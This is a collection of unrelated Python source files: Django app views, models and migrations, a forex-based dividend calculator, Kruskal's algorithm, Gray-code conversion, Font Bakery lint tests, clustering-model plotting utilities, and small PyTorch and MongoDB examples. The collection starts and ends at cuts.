url = f"https://fcsapi.com/api-v2/forex/converter?symbol={i}/{sgd}&amount=1&access_key={fcs_key}"
response = requests.get(url).json()
currency_conversions[i] = float(response['response']['price_1x_SGD'])
return currency_conversions
def calculate_dividend_received() -> None:
""" Calculates dividend received based on number of units
and dividends payout
"""
stock = key_stock_labels()
foreign_currency = []
for k, v in stock.items():
if not v['currency'] == 'SGD':
foreign_currency.append(v['currency'])
# creates dict of currency conversions to be used later
currency_conversions = currency_converter(foreign_currency)
for k, v in stock.items():
filename = f"{check_make_dir()}\\{v['name']}_dividends.csv"
df = pd.read_csv(filename)
if not v['name'] in df: # Labels each row with stock name for future analysis
df.insert(loc=0, column=v['name'], value=v['name'])
if not 'Total Dividends/SGD' in df: # checks if Total Dividends/SGD column already in DataFrame
df['Total Dividends/SGD'] = 0 # creates column
for i in range(len(df.index)):
# Calculate total dividends if not calculated
if df.at[i, 'Total Dividends/SGD'] == 0:
if v['currency'] == 'SGD':
total_div = df.loc[i, 'Dividends'] * v['units']
df.loc[i, 'Total Dividends/SGD'] = total_div
else: # do conversion to SGD
total_div = df.loc[i, 'Dividends'] * v['units']
df.loc[i, 'Total Dividends/SGD'] = total_div * (currency_conversions[v['currency']])
df.to_csv(filename, index=False)
|
# %% Import Libraries
from utils import edges, show_graph, Graph, get_input, sort_edge, is_connected
from copy import deepcopy
# %% Algorithm
def kruskal(graph):
"""
Apply Kruskal algorithm to find minimum spanning tree of a graph
:param graph: A list of nodes (a graph)
:return: Spanning tree of a graph as a list of nodes (a graph)
"""
edges = sort_edge(graph)
graph = deepcopy(graph)
for e in edges:
s, d, w = e
des_node = [n for n in graph if n.idx == d][0]
for n in graph:
if n.idx == s:
n.remove_adjacent(d)
print(s, '->',d,':',w,' Removed!')
break
if not is_connected(graph):
for n in graph:
if n.idx == s:
n.add_adjacent(des_node, w)
print(s, '->',d,':',w,' Added!')
return graph
# %% Test
g = get_input()
g = kruskal(g)
edges(g, p=True)
# this is sample input.
# Look at the image in the root directory please.
# 0 1 4
# 0 7 8
# 1 2 8
# 1 7 11
# 2 3 7
# 2 8 2
# 7 8 7
# 7 6 1
# 8 6 6
# 6 5 2
# 2 5 4
# 3 5 14
# 3 4 9
# 5 4 10
# 0 |
def flip_num(my_nu):
return '1' if(my_nu == '0') else '0';
def gray_to_binary(gray):
binary_code = ""
binary_code += gray[0]
for i in range(1, len(gray)):
if (gray[i] == '0'):
binary_code += binary_code[i - 1]
else:
binary_code += flip_num(binary_code[i - 1])
return binary_code
gray_code = "01101001"
print("The gray code is :")
print(gray_code)
print("Binary code of", gray_code, "is", gray_to_binary(gray_code))
|
# coding: utf-8
# Copyright 2013 The Font Bakery Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# See AUTHORS.txt for the list of Authors and LICENSE.txt for the License.
import os
from bakery_lint.base import BakeryTestCase as TestCase, tags
from bakery_lint.metadata import Metadata
from bakery_cli.ttfont import Font
class TestFontOnDiskFamilyEqualToMetadataJSON(TestCase):
name = __name__
targets = ['metadata']
tool = 'lint'
def read_metadata_contents(self):
return open(self.operator.path).read()
@tags('required',)
def test_font_on_disk_family_equal_in_metadata_json(self):
""" Font on disk and in METADATA.json have the same family name """
contents = self.read_metadata_contents()
metadata = Metadata.get_family_metadata(contents)
unmatched_fonts = []
for font_metadata in metadata.fonts:
try:
font = Font.get_ttfont_from_metadata(self.operator.path,
font_metadata)
except IOError:
continue
if font.familyname != font_metadata.name:
unmatched_fonts.append(font_metadata.filename)
if unmatched_fonts:
msg = 'Unmatched family name are in fonts: {}'
self.fail(msg.format(', '.join(unmatched_fonts)))
class TestPostScriptNameInMetadataEqualFontOnDisk(TestCase):
name = __name__
targets = ['metadata']
tool = 'lint'
def read_metadata_contents(self):
return open(self.operator.path).read()
@tags('required')
def test_postscriptname_in_metadata_equal_to_font_on_disk(self):
""" Checks METADATA.json 'postScriptName' matches TTF 'postScriptName' """
contents = self.read_metadata_contents()
metadata = Metadata.get_family_metadata(contents)
for font_metadata in metadata.fonts:
try:
font = Font.get_ttfont_from_metadata(self.operator.path, font_metadata)
except IOError:
continue
if font.post_script_name != font_metadata.post_script_name:
msg = 'In METADATA postScriptName="{0}", but in TTF "{1}"'
self.fail(msg.format(font.post_script_name,
font_metadata.post_script_name))
class CheckMetadataAgreements(TestCase):
name = __name__
targets = ['metadata']
tool = 'lint'
def setUp(self):
contents = self.read_metadata_contents()
self.metadata = Metadata.get_family_metadata(contents)
def read_metadata_contents(self):
return open(self.operator.path).read()
def test_metadata_family_values_are_all_the_same(self):
""" Check that METADATA family values are all the same """
name = ''
for font_metadata in self.metadata.fonts:
if name and font_metadata.name != name:
self.fail('Family name in metadata fonts items not the same')
name = font_metadata.name
def test_metadata_font_have_regular(self):
""" According GWF standarts font should have Regular style. """
# this tests will appear in each font
have = False
for i in self.metadata.fonts:
if i.weight == 400 and i.style == 'normal':
have = True
self.assertTrue(have)
@tags('required')
def test_metadata_regular_is_400(self):
""" Regular should be 400 """
have = False
for i in self.metadata.fonts:
if i.filename.endswith('Regular.ttf') and i.weight == 400:
have = True
if not have:
self.fail(('METADATA.json does not contain Regular font. At least'
' one font must be Regular and its weight must be 400'))
def test_metadata_regular_is_normal(self):
""" Usually Regular should be normal style """
have = False
for x in self.metadata.fonts:
if x.full_name.endswith('Regular') and x.style == 'normal':
have = True
self.assertTrue(have)
@tags('required')
def test_metadata_filename_matches_postscriptname(self):
""" METADATA.json `filename` matches `postScriptName` """
import re
regex = re.compile(r'\W')
for x in self.metadata.fonts:
post_script_name = regex.sub('', x.post_script_name)
filename = regex.sub('', os.path.splitext(x.filename)[0])
if filename != post_script_name:
msg = '"{0}" does not match "{1}"'
self.fail(msg.format(x.filename, x.post_script_name))
@tags('required')
def test_metadata_fullname_matches_postScriptName(self):
""" METADATA.json `fullName` matches `postScriptName` """
import re
regex = re.compile(r'\W')
for x in self.metadata.fonts:
post_script_name = regex.sub('', x.post_script_name)
fullname = regex.sub('', x.full_name)
if fullname != post_script_name:
msg = '"{0}" does not match "{1}"'
self.fail(msg.format(x.full_name, x.post_script_name))
def test_metadata_fullname_is_equal_to_internal_font_fullname(self):
""" METADATA.json 'fullname' value matches internal 'fullname' """
for font_metadata in self.metadata.fonts:
font = Font.get_ttfont_from_metadata(self.operator.path, font_metadata)
self.assertEqual(font.fullname, font_metadata.full_name)
def test_font_name_matches_family(self):
""" METADATA.json fonts 'name' property should be
same as font familyname """
for font_metadata in self.metadata.fonts:
font = Font.get_ttfont_from_metadata(self.operator.path, font_metadata)
if font_metadata.name != font.familyname:
msg = '"fonts.name" property is not the same as TTF familyname'
self.fail(msg)
def test_metadata_fonts_fields_have_fontname(self):
""" METADATA.json fonts items fields "name", "postScriptName",
"fullName", "filename" contains font name right format """
for x in self.metadata.fonts:
font = Font.get_ttfont_from_metadata(self.operator.path, x)
self.assertIn(font.familyname, x.name)
self.assertIn(font.familyname, x.full_name)
self.assertIn("".join(str(font.familyname).split()),
x.filename)
self.assertIn("".join(str(font.familyname).split()),
x.post_script_name)
|
# Create your views here.
from django.http import HttpResponse,HttpResponseRedirect
from django.shortcuts import render,get_object_or_404,render_to_response
from django.utils import timezone
from django.core.context_processors import csrf
from django import forms
from django.template import RequestContext
from core.models import Entry
from core.forms import ContactForm
def index(request):
return HttpResponse('I love')
def home(request):
# return HttpResponse('I love')
c = {}
c.update(csrf(request))
if request.method == 'POST': # If the form has been submitted...
form = ContactForm(request.POST) # A form bound to the POST data
if form.is_valid():
email = form.cleaned_data['email']
name = form.cleaned_data['name']
message = form.cleaned_data['text']
comments = form.cleaned_data['comments']
recipients = ['troush69@gmail.com']
e = Entry(email=form.cleaned_data['email'],name=form.cleaned_data['name'],text=form.cleaned_data['text'],comments=form.cleaned_data['comments'],pub_date=timezone.now())
e.save()
# from django.core.mail import send_mail
# send_mail(name, message.join(comments), 'troush69@gmail.com',recipients)
return HttpResponseRedirect('/') # Redirect after POST
else:
form = ContactForm() # An unbound form
return render_to_response('home.html', {
'form': form,
}, RequestContext(request))
def content(request):
return render(request, 'content.html', locals()) |
from os.path import join
from joblib import load
import os
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
from mvmm.multi_view.block_diag.graph.bipt_community import community_summary
from mvmm.multi_view.block_diag.graph.linalg import eigh_Lsym_bp
from mvmm.clustering_measures import MEASURE_MIN_GOOD
from mvmm.linalg_utils import pca
from mvmm_sim.simulation.opt_viz import plot_loss_history
from mvmm_sim.simulation.sim_viz import save_fig
from mvmm_sim.viz_utils import draw_ellipse
def plot_mvmm_model_selection(model_sel_df, group_var,
group_var_label=None, select_metric='bic',
cmap="Set2"):
all_view_comp_idxs = np.unique(model_sel_df['view_comp_idx'])
colors = sns.color_palette(cmap, len(all_view_comp_idxs))
if group_var_label is None:
group_var_label = group_var
for i, view_comp_idx in enumerate(all_view_comp_idxs):
df = model_sel_df.query("view_comp_idx == @view_comp_idx")
df = df.sort_values(group_var)
color = colors[i]
plt.plot(df[group_var], df[select_metric],
marker='.', color=color, alpha=.5)
plt.xlabel(group_var_label)
plt.ylabel(select_metric)
# label n view comp curves
x_coord = max(df[group_var])
y_coord = df[select_metric].values[-1]
text = df['n_view_comp'].values[0]
plt.text(x=x_coord, y=y_coord, s=text, color=color)
if MEASURE_MIN_GOOD[select_metric]:
sel_idx = model_sel_df[select_metric].idxmin()
else:
sel_idx = model_sel_df[select_metric].idxmax()
sel_row = model_sel_df.loc[sel_idx]
plt.title('{} selected {}\n n_blocks {}, n_comp {}'.
format(select_metric,
sel_row['n_view_comp'],
sel_row['n_blocks_est'],
sel_row['n_comp_est']))
def plot_Pi(Pi, mask=None, cmap="Blues", cbar=True, square=True,
force_annot_off=False, linewidths=0):
"""
Plots estimated Pi matrix.
Transposes so the first view is on the columns and the second view
is on the rows.
"""
# TODO: allow for labels on each axis
annot = max(Pi.shape) <= 10
if force_annot_off:
annot = False
if mask is not None:
mask = mask.T
sns.heatmap(Pi.T, square=square, cbar=cbar, vmin=0, cmap=cmap,
annot=annot, fmt='.3f', mask=mask,
linewidths=linewidths,
xticklabels=True, yticklabels=True)
def plot_mvmm(mvmm, inches=8, save_dir=None):
"""
Plots loss history and estimated Pi matrix.
"""
if save_dir is not None:
os.makedirs(save_dir, exist_ok=True)
# TODO: maybe add Pi start
loss_vals = mvmm.opt_data_['history']['loss_val']
################
# Loss history #
################
plot_loss_history(loss_vals,
loss_name='Observed data negative log-likelihood')
if save_dir is not None:
fpath = join(save_dir, 'loss_history.png')
save_fig(fpath)
###############
# Pi estimate
################
plt.figure(figsize=(inches, inches))
plot_Pi(mvmm.weights_mat_)
plt.title("Estimated Pi")
if save_dir is not None:
fpath = join(save_dir, 'Pi_est.png')
save_fig(fpath)
#######################
# Block diagonal MVMM #
#######################
def plot_bd_mvmm(mvmm, inches=8, save_dir=None):
"""
Initial BD weights, Estimated BD weights, spectrums of both
Number of steps in each adaptive stage
Evals of entire path
Loss history for each segment
"""
if save_dir is not None:
os.makedirs(save_dir, exist_ok=True)
info = get_bd_mvmm_info(mvmm)
if save_dir is not None:
# TODO: save this
save_dir
else:
print(info)
# BD weight estimate
bd_weights = mvmm.bd_weights_
zero_thresh = mvmm.zero_thresh
summary, Pi_comm = community_summary(bd_weights, zero_thresh=zero_thresh)
bd_weights_symlap_spec = eigh_Lsym_bp(bd_weights)[0]
# initial BD weights
bd_weights_init = mvmm.opt_data_['adpt_opt_data']['adapt_pen_history']['opt_data'][0]['history']['init_params']['bd_weights']
bd_weights_init_symlap_spec = eigh_Lsym_bp(bd_weights_init)[0]
# optimization history
adpt_history = mvmm.opt_data_['adpt_opt_data']['adapt_pen_history']['opt_data']
if 'raw_eval_sum' in adpt_history[0]['history']:
n_steps = [len(adpt_history[i]['history']['raw_eval_sum'])
for i in range(len(adpt_history))]
n_steps_cumsum = np.cumsum(n_steps)
raw_eval_sum = \
np.concatenate([adpt_history[i]['history']['raw_eval_sum']
for i in range(len(adpt_history))])
else:
raw_eval_sum = None
n_steps = None
n_steps_cumsum = None
obs_nll = np.concatenate([adpt_history[i]['history']['obs_nll']
for i in range(len(adpt_history))])
if mvmm.opt_data_['ft_opt_data'] is not None:
fine_tune_obs_nll = mvmm.opt_data_['ft_opt_data']['history']['obs_nll']
else:
fine_tune_obs_nll = None
######################
# Initial BD weights #
######################
plt.figure(figsize=(inches, inches))
plot_Pi(bd_weights_init)
plt.title('BD weights initial value')
if save_dir is not None:
fpath = join(save_dir, 'BD_weights_init.png')
save_fig(fpath)
########################
# Estimated BD weights #
########################
plt.figure(figsize=(2 * inches, inches))
plt.subplot(1, 2, 1)
plot_Pi(bd_weights)
plt.title('BD weights estimate, n_blocks={}'.
format(summary['n_communities']))
plt.subplot(1, 2, 2)
plot_Pi(bd_weights, mask=Pi_comm < zero_thresh)
plt.title('BD weights estimate, block diagonal perm')
if save_dir is not None:
fpath = join(save_dir, 'BD_weights_est.png')
save_fig(fpath)
##########################
# Spectrum of BD weights #
##########################
plt.figure(figsize=(inches, inches))
idxs = np.arange(1, len(bd_weights_symlap_spec) + 1)
plt.plot(idxs, bd_weights_symlap_spec, marker='.', label='Estimate')
plt.plot(idxs, bd_weights_init_symlap_spec, marker='.', label="Initial")
plt.title('BD weights estimate spectrum')
plt.ylim(0)
plt.legend()
if save_dir is not None:
fpath = join(save_dir, 'BD_weights_spectrum.png')
save_fig(fpath)
##################################
# Number of steps for each stage #
##################################
if n_steps is not None:
plt.figure(figsize=(inches, inches))
idxs = np.arange(1, len(n_steps) + 1)
plt.plot(idxs, n_steps, marker='.')
plt.ylim(0)
plt.ylabel("Number of steps")
plt.xlabel("Adaptive stage")
if save_dir is not None:
fpath = join(save_dir, 'n_steps.png')
save_fig(fpath)
###########################
# Obs NLL for entire path #
###########################
plt.figure(figsize=[inches, inches])
plot_loss_history(obs_nll, loss_name="Obs NLL (entire path)")
if save_dir is not None:
fpath = join(save_dir, 'path_obs_nll.png')
save_fig(fpath)
#########################
# Evals for entire path #
#########################
if raw_eval_sum is not None:
plt.figure(figsize=[inches, inches])
plt.plot(np.log10(raw_eval_sum), marker='.')
plt.ylabel('log10(sum smallest evals)')
plt.xlabel('step')
plt.title('Eigenvalue history (entire path)')
for s in n_steps_cumsum:
plt.axvline(s - 1, color='grey')
if save_dir is not None:
fpath = join(save_dir, 'path_evals.png')
save_fig(fpath)
###########################
# Losses for each segment #
###########################
if save_dir is not None:
segment_dir = join(save_dir, 'segments')
os.makedirs(segment_dir, exist_ok=True)
for i in range(len(adpt_history)):
loss_vals = adpt_history[i]['history']['loss_val']
plot_loss_history(loss_vals, 'loss val, adapt segment {}'.
format(i + 1))
if save_dir is not None:
fpath = join(segment_dir, 'loss_history_{}.png'.format(i + 1))
save_fig(fpath)
##########################
# fine tune loss history #
##########################
if fine_tune_obs_nll is not None:
plot_loss_history(fine_tune_obs_nll, 'fine tune obs NLL')
if save_dir is not None:
fpath = join(segment_dir, 'fine_tune_loss_history.png')
save_fig(fpath)
def get_bd_mvmm_info(mvmm):
info = {"sucess": mvmm.opt_data_['success'],
"n_blocks_req": mvmm.n_blocks,
"n_blocks_est": mvmm.opt_data_['n_blocks_est'],
"adpat_opt_runtime": mvmm.opt_data_['adpt_opt_data']["runtime"]}
if mvmm.opt_data_['ft_opt_data'] is not None:
info["fine_tune_runtime"] = mvmm.opt_data_['ft_opt_data']["runtime"]
info['eval_pen_inits'] = mvmm.opt_data_['adpt_opt_data']['eval_pen_init']
return info
def plot_log_pen_mvmm(mvmm, inches=8, save_dir=None):
if save_dir is not None:
os.makedirs(save_dir, exist_ok=True)
# info = get_log_pen_mvmm_info(mvmm)
# if save_dir is not None:
# # TODO: save this
# save_dir
# else:
# print(info)
Pi = mvmm.weights_mat_
zero_thresh = 1e-10 # not sure if we need this
summary, Pi_comm = community_summary(Pi, zero_thresh=zero_thresh)
Pi_symlap_spec = eigh_Lsym_bp(Pi)[0]
if 'init_params' in mvmm.opt_data_['history']:
Pi_init = mvmm.opt_data_['history']['weights'].reshape(Pi.shape) # TODO: check this
Pi_init_symlap_spec = eigh_Lsym_bp(Pi_init)[0]
else:
Pi_init = None
obs_nll = mvmm.opt_data_['history']['obs_nll']
loss_vals = mvmm.opt_data_['history']['loss_val']
####################
# Initial weights #
###################
if Pi_init is not None:
plt.figure(figsize=(inches, inches))
plot_Pi(Pi_init)
plt.title('weights initial value')
if save_dir is not None:
fpath = join(save_dir, 'weights_init.png')
save_fig(fpath)
######################
# Estimated weights #
######################
plt.figure(figsize=(2 * inches, inches))
plt.subplot(1, 2, 1)
plot_Pi(Pi)
plt.title('weights estimate, n_blocks={}'.
format(summary['n_communities']))
plt.subplot(1, 2, 2)
plot_Pi(Pi, mask=Pi_comm < zero_thresh)
plt.title('weights estimate, block diagonal perm')
if save_dir is not None:
fpath = join(save_dir, 'weights_est.png')
save_fig(fpath)
##########################
# Spectrum of BD weights #
##########################
plt.figure(figsize=(inches, inches))
idxs = np.arange(1, len(Pi_symlap_spec) + 1)
plt.plot(idxs, Pi_symlap_spec, marker='.', label='Estimate')
if Pi_init is not None:
plt.plot(idxs, Pi_init_symlap_spec, marker='.', label="Initial")
plt.title('weights estimate spectrum')
plt.ylim(0)
plt.legend()
if save_dir is not None:
fpath = join(save_dir, 'weights_spectrum.png')
save_fig(fpath)
###########################
# Obs NLL for entire path #
###########################
plt.figure(figsize=[inches, inches])
plot_loss_history(obs_nll,
loss_name="Obs NLL")
if save_dir is not None:
fpath = join(save_dir, 'obs_nll.png')
save_fig(fpath)
plt.figure(figsize=[inches, inches])
plot_loss_history(loss_vals,
loss_name="log penalized obs nll")
if save_dir is not None:
fpath = join(save_dir, 'loss_vals.png')
save_fig(fpath)
def plot_mvmm_pcs(mvmm, X, dataset_names=None):
if dataset_names is None:
dataset_names = ['view 1', 'view 2']
y_pred = mvmm.predict(X)
n_comp = mvmm.n_components
n_view_comps = mvmm.n_view_components
overall_clust_colors = sns.color_palette("Set2", n_comp)
data_colors = np.array(overall_clust_colors)[y_pred]
view_clust_colors = [[None for _ in range(n_view_comps[0])],
[None for _ in range(n_view_comps[1])]]
for k in range(n_comp):
col = overall_clust_colors[k]
k0, k1 = mvmm._get_view_clust_idx(k)
view_clust_colors[0][k0] = col
view_clust_colors[1][k1] = col
for v in range(len(X)):
# get firt two PCs of data
# TODO: should we standarize data first or something
U, D, V, m = pca(X[v], rank=2)
# project data and means onto PCs
proj_data = X[v] @ V # U * D
gmm = mvmm.view_models_[v]
proj_means = gmm.means_ @ V # (gmm.means_ - m) @ V
# data_colors = 'black'
# plt.figure(figsize=(8, 8))
plt.subplot(1, 2, v + 1)
plt.scatter(proj_data[:, 0], proj_data[:, 1], color=data_colors, s=10)
for j in range(n_view_comps[v]):
plt.scatter(proj_means[j, 0], proj_means[j, 1],
marker='x', s=200, lw=5,
color=view_clust_colors[v][j])
# get class covariance
if gmm.covariance_type == 'diag':
cov = np.diag(gmm.covariances_[j])
# project covariance matrix onto PCs
proj_cov = (V.T @ cov @ V) # TODO: does this make sense
draw_ellipse(position=proj_means[j, :], covariance=proj_cov,
facecolor='none',
edgecolor=view_clust_colors[v][j], lw=1)
plt.xlabel('PC 1')
plt.ylabel('PC 2')
|
# coding:utf-8
# This program is used to show the curves of Figure 2 in the paper
import numpy as np
import matplotlib.pyplot as plt
# The font size on the graph we will plot
size_font = 18
# The marker size on the graph we will plot
size_marker = 9
# Opening a txt file
f = open("../Data/SampleIncrease.txt")
sample_num_lists = []
emp_lists = []
emp_test_lists = []
emp_test_minus_emp_lists = []
line = f.readline()
while line:
line = line.strip().split(",")
sample_num_lists.append(line[0])
emp_lists.append(line[1])
emp_test_lists.append(line[2])
emp_test_minus_emp_lists.append(line[3])
line = f.readline()
sample_num_data = np.array(sample_num_lists)
sample_num_data = sample_num_data.astype(float)
print sample_num_data
emp_data = np.array(emp_lists)
emp_data = emp_data.astype(float)
print emp_data
emp_test_data = np.array(emp_test_lists)
emp_test_data = emp_test_data.astype(float)
print emp_test_data
emp_test_minus_emp_data = np.array(emp_test_minus_emp_lists)
emp_test_minus_emp_data = emp_test_minus_emp_data.astype(float)
print emp_test_minus_emp_data
f.close()
# Graphic display
plt.figure(figsize=(12, 7))
plt.plot(sample_num_data[0:14], emp_test_data[0:14], 'bo', linestyle='--',
label='Test distributed error', markersize=size_marker)
plt.plot(sample_num_data[0:14], emp_test_minus_emp_data[0:14], 'rs', linestyle=':',
label='Difference', markersize=size_marker)
show_value1 = str(0.06853)
plt.annotate(show_value1, xytext=(7500, 0.074), xy=(8000, 0.068534939767174))
plt.plot(8000, 0.068534939767174,'ys')
show_value2 = str(0.05762)
plt.annotate(show_value2, xytext=(9500, 0.063), xy=(10000, 0.057624356515303045))
plt.plot(10000, 0.057624356515303045,'ys')
# Ploting the x lable
plt.xticks(fontsize=size_font)
plt.xlabel("Size of samples", fontsize=size_font)
# Ploting the y lable
plt.yticks(fontsize=size_font)
plt.ylabel("Risk / Error", fontsize=size_font)
plt.legend(fontsize=size_font, loc='upper right')
plt.show()
|
from django.conf.urls.defaults import *
from django.views.generic.simple import direct_to_template
from django.views.generic.list_detail import object_list
from stereoit.djangoapps.news.models import News
news_dict = {
'queryset' : News.objects.all()
}
urlpatterns = patterns('stereoit.djangoapps.news.views',
# (r'show/1/$', 'news_test'), #show news detail
(r'^$', direct_to_template, {'template': 'news/index.html'}),
(r'^archive/$', object_list, dict(
news_dict,
paginate_by=20,
template_object_name='news',
)),
url(r'^(?P<slug>[-\w]+)$', 'detail', name="news_detail"), #show news detail
)
|
#!env python3
# -*- coding: utf-8 -*-
from pymongo import MongoClient
nobel_winners = [{
'category': 'Physics',
'name': 'Albert Einstein',
'nationality': 'Swiss',
'sex': 'male',
'year': 1921
}, {
'category': 'Physics',
'name': 'Paul Dirac',
'nationality': 'British',
'sex': 'male',
'year': 1933
}, {
'category': 'Chemistry',
'name': 'Marie Curie',
'nationality': 'Polish',
'sex': 'female',
'year': 1911
}]
client = MongoClient('localhost', 27017)
db = client.nobel_prize
coll = db.winners
coll.insert(nobel_winners)
print(nobel_winners)
res = coll.find({'category':'Chemistry'})
print(list(res))
res = coll.find({'year':{'$gt':1930}}, {'sex':'female'})
print(list(res))
|
import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
import torch.nn.init as init
from torch.utils import data
import torch.utils.model_zoo as model_zoo
from torchvision import models
class Refine(nn.Module):
def __init__(self, inplanes, planes, scale_factor=2):
super(Refine, self).__init__()
self.convFS1 = nn.Conv2d(inplanes, planes, kernel_size=3, padding=1)
self.convFS2 = nn.Conv2d(planes, planes, kernel_size=3, padding=1)
self.convFS3 = nn.Conv2d(planes, planes, kernel_size=3, padding=1)
self.convMM1 = nn.Conv2d(planes, planes, kernel_size=3, padding=1)
self.convMM2 = nn.Conv2d(planes, planes, kernel_size=3, padding=1)
self.scale_factor = scale_factor
def forward(self, f, pm):
s = self.convFS1(f)
sr = self.convFS2(F.relu(s))
sr = self.convFS3(F.relu(sr))
s = s + sr
m = s + F.upsample(pm, scale_factor=self.scale_factor, mode='bilinear')
mr = self.convMM1(F.relu(m))
mr = self.convMM2(F.relu(mr))
m = m + mr
return m |
from SingleLinkList import SingleLinkList
def find_common_node1(singlelinklistA, singlelinklistB):
"""
思路一:两个单链中的元素依次分别放入两个栈中,然后依次弾栈找到第一个不相同的元素,
最后一个相同的元素就是第一个公共的节点.
"""
stack_A = []
stack_B = []
same_item = []
while not singlelinklistA.isEmpty():
stack_A.append(singlelinklistA.pop_head())
while not singlelinklistB.isEmpty():
stack_B.append(singlelinklistB.pop_head())
# print('==================', stack_A)
# print('========================', stack_B)
while stack_A and stack_B:
if stack_A[-1] == stack_B[-1]:
same_item.append(stack_A.pop())
stack_B.pop()
# print('========', same_item)
return same_item[-1]
def find_common_node2(singlelinklistA, singlelinklistB):
'''
思路二:
判断两个链表哪个长,先让指向长链表的指针向后移动两链表长度差个单位,之后两链表同时移动
每移动一个单位判断当前的值是否相同,如果值相同则这个值就是第一个公共节点,如果不同则依次向后继续
查找
'''
lenA = singlelinklistA.len()
lenB = singlelinklistB.len()
if lenA > lenB:
k = lenA - lenB
# print(k)
while k:
# print(singlelinklistA.pop_head())
singlelinklistA.pop_head()
k -= 1
else:
k = lenB - lenA
# print('else:', k)
while k:
singlelinklistB.pop_head()
while not singlelinklistA.isEmpty() and not singlelinklistB.isEmpty():
numA = singlelinklistA.pop_head()
numB = singlelinklistB.pop_head()
# print(numA, '***********', numB)
if numA == numB:
return numA
def main():
'''把握住公共节点的最大的特征:公共节点之后的元素都是相同的!!!'''
singlelinklistA = SingleLinkList()
singlelinklistB = SingleLinkList()
# singlelinklistA.insert(1)
# singlelinklistA.insert(2)
# singlelinklistA.insert(3)
# print(singlelinklistA.pop())
# print(singlelinklistA.pop_head())
# print(singlelinklistA.pop_head())
# print(singlelinklistA.pop_head())
# print(singlelinklistA.pop_head())
for i in range(0, 11):
singlelinklistA.append(i)
for i in range(3, 11):
singlelinklistB.append(i)
# print(find_common_node1(singlelinklistA, singlelinklistB))
print(find_common_node2(singlelinklistA, singlelinklistB))
if __name__ == '__main__':
main()
|
from django.contrib import admin
from .models import Region, Country
admin.site.register(Region)
admin.site.register(Country) |
from django.db import models
from django.utils.translation import ugettext as _
from django.core.validators import MaxValueValidator, MinValueValidator
class ThomCurrency(models.Model):
currency = models.CharField(max_length=5, primary_key=True, verbose_name=_("Currency"))
currency_name = models.CharField(max_length=50, verbose_name=_("Currency Name"))
def __str__(self):
return '(' + self.currency + ')-' + self.currency_name
class Meta:
app_label = 'filab'
db_table = 'thom_currency'
class ThomDailyCurrency(models.Model):
SOURCE_CHOICES = (
('all',_('All'),),
('news',_('News'),),
('social',_('Social'),),
)
rowid = models.CharField(primary_key=True, max_length=40)
currency = models.ForeignKey(ThomCurrency,db_column='currency', verbose_name=_("Currency"))
date = models.DateField(verbose_name=_("Date"))
time = models.TimeField(verbose_name=_("Time"))
source = models.CharField(max_length=10, choices=SOURCE_CHOICES, verbose_name=_("Source"))
buzz = models.FloatField(verbose_name=_("Buzz"), blank=True, null=True)
sentiment = models.FloatField(validators=[MaxValueValidator(1), MinValueValidator(-1)], verbose_name=_("Sentiment"), blank=True, null=True)
optimism = models.FloatField(validators=[MaxValueValidator(1), MinValueValidator(-1)], verbose_name=_("Optimism"), blank=True, null=True)
fear = models.FloatField(validators=[MaxValueValidator(1), MinValueValidator(0)], verbose_name=_("Fear"), blank=True, null=True)
joy = models.FloatField(validators=[MaxValueValidator(1), MinValueValidator(0)], verbose_name=_("Joy"), blank=True, null=True)
trust = models.FloatField(validators=[MaxValueValidator(1), MinValueValidator(-1)], verbose_name=_("Trust"), blank=True, null=True)
violence = models.FloatField(validators=[MaxValueValidator(1), MinValueValidator(0)], verbose_name=_("Violence"), blank=True, null=True)
conflict = models.FloatField(validators=[MaxValueValidator(1), MinValueValidator(-1)], verbose_name=_("Conflict"), blank=True, null=True)
urgency = models.FloatField(validators=[MaxValueValidator(1), MinValueValidator(-1)], verbose_name=_("Urgency"), blank=True, null=True)
uncertainty = models.FloatField(validators=[MaxValueValidator(1), MinValueValidator(0)], verbose_name=_("Uncertainty"), blank=True, null=True)
price = models.FloatField(validators=[MaxValueValidator(1), MinValueValidator(-1)], verbose_name=_("Price"), blank=True, null=True)
priceforecast = models.FloatField(validators=[MaxValueValidator(1), MinValueValidator(-1)], verbose_name=_("Price Forecast"), blank=True, null=True)
carrytrade = models.FloatField(validators=[MaxValueValidator(1), MinValueValidator(0)], verbose_name=_("Carry Trade"), blank=True, null=True)
currencypeginstability = models.FloatField(validators=[MaxValueValidator(1), MinValueValidator(-1)], verbose_name=_("Currency Pegin Stability"), blank=True, null=True)
pricemomentum = models.FloatField(validators=[MaxValueValidator(1), MinValueValidator(-1)], verbose_name=_("Price Momentum"), blank=True, null=True)
class Meta:
app_label = 'filab'
db_table = 'thom_dailycurrency'
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Fields',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=500)),
('created_at', models.DateTimeField(auto_now=True)),
('description', models.TextField()),
('type', models.CharField(max_length=500, verbose_name=b'Type of argument', choices=[(b'FT', b'File Type'), (b'INT', b'Integer Type'), (b'FLT', b'Float Type'), (b'STR', b'String Type')])),
('env', models.CharField(help_text=b'Specify env var as name=$value', max_length=100000, verbose_name=b'Env variables')),
],
options={
'verbose_name': 'Field',
'verbose_name_plural': 'Fields',
},
),
migrations.CreateModel(
name='Tool',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=500)),
('created_at', models.DateTimeField(auto_now=True)),
('description', models.TextField()),
('usage', models.TextField()),
('file', models.FileField(upload_to=b'', verbose_name=b'Upload the file of the tool')),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='ToolLocation',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('location', models.TextField()),
('tool', models.ForeignKey(to='User.Tool')),
],
),
migrations.AddField(
model_name='fields',
name='tool',
